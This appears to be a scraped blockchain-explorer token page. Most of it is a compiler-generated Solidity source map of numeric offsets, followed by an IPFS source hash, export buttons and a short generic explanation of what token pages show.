2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:117::-;6129:1;6126;6119:12;6143:117;6252:1;6249;6242:12;6266:117;6375:1;6372;6365:12;6406:568;6479:8;6489:6;6539:3;6532:4;6524:6;6520:17;6516:27;6506:122;;6547:79;;:::i;:::-;6506:122;6660:6;6647:20;6637:30;;6690:18;6682:6;6679:30;6676:117;;;6712:79;;:::i;:::-;6676:117;6826:4;6818:6;6814:17;6802:29;;6880:3;6872:4;6864:6;6860:17;6850:8;6846:32;6843:41;6840:128;;;6887:79;;:::i;:::-;6840:128;6406:568;;;;;:::o;6980:704::-;7075:6;7083;7091;7140:2;7128:9;7119:7;7115:23;7111:32;7108:119;;;7146:79;;:::i;:::-;7108:119;7266:1;7291:53;7336:7;7327:6;7316:9;7312:22;7291:53;:::i;:::-;7281:63;;7237:117;7421:2;7410:9;7406:18;7393:32;7452:18;7444:6;7441:30;7438:117;;;7474:79;;:::i;:::-;7438:117;7587:80;7659:7;7650:6;7639:9;7635:22;7587:80;:::i;:::-;7569:98;;;;7364:313;6980:704;;;;;:::o;7690:180::-;7738:77;7735:1;7728:88;7835:4;7832:1;7825:15;7859:4;7856:1;7849:15;7876:320;7920:6;7957:1;7951:4;7947:12;7937:22;;8004:1;7998:4;7994:12;8025:18;8015:81;;8081:4;8073:6;8069:17;8059:27;;8015:81;8143:2;8135:6;8132:14;8112:18;8109:38;8106:84;;8162:18;;:::i;:::-;8106:84;7927:269;7876:320;;;:::o;8202:180::-;8250:77;8247:1;8240:88;8347:4;8344:1;8337:15;8371:4;8368:1;8361:15;8388:180;8436:77;8433:1;8426:88;8533:4;8530:1;8523:15;8557:4;8554:1;8547:15;8574:233;8613:3;8636:24;8654:5;8636:24;:::i;:::-;8627:33;;8682:66;8675:5;8672:77;8669:103;;8752:18;;:::i;:::-;8669:103;8799:1;8792:5;8788:13;8781:20;;8574:233;;;:::o;8813:442::-;8962:4;9000:2;8989:9;8985:18;8977:26;;9013:71;9081:1;9070:9;9066:17;9057:6;9013:71;:::i;:::-;9094:72;9162:2;9151:9;9147:18;9138:6;9094:72;:::i;:::-;9176;9244:2;9233:9;9229:18;9220:6;9176:72;:::i;:::-;8813:442;;;;;;:::o;9261:191::-;9301:3;9320:20;9338:1;9320:20;:::i;:::-;9315:25;;9354:20;9372:1;9354:20;:::i;:::-;9349:25;;9397:1;9394;9390:9;9383:16;;9418:3;9415:1;9412:10;9409:36;;;9425:18;;:::i;:::-;9409:36;9261:191;;;;:::o;9458:410::-;9498:7;9521:20;9539:1;9521:20;:::i;:::-;9516:25;;9555:20;9573:1;9555:20;:::i;:::-;9550:25;;9610:1;9607;9603:9;9632:30;9650:11;9632:30;:::i;:::-;9621:41;;9811:1;9802:7;9798:15;9795:1;9792:22;9772:1;9765:9;9745:83;9722:139;;9841:18;;:::i;:::-;9722:139;9506:362;9458:410;;;;:::o;9874:180::-;9922:77;9919:1;9912:88;10019:4;10016:1;10009:15;10043:4;10040:1;10033:15;10060:185;10100:1;10117:20;10135:1;10117:20;:::i;:::-;10112:25;;10151:20;10169:1;10151:20;:::i;:::-;10146:25;;10190:1;10180:35;;10195:18;;:::i;:::-;10180:35;10237:1;10234;10230:9;10225:14;;10060:185;;;;:::o

Swarm Source

ipfs://c066de68acba1858bee9e4a360fa2ad4e4aeb8ec8ffc6f64aae12c55e8e72269
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.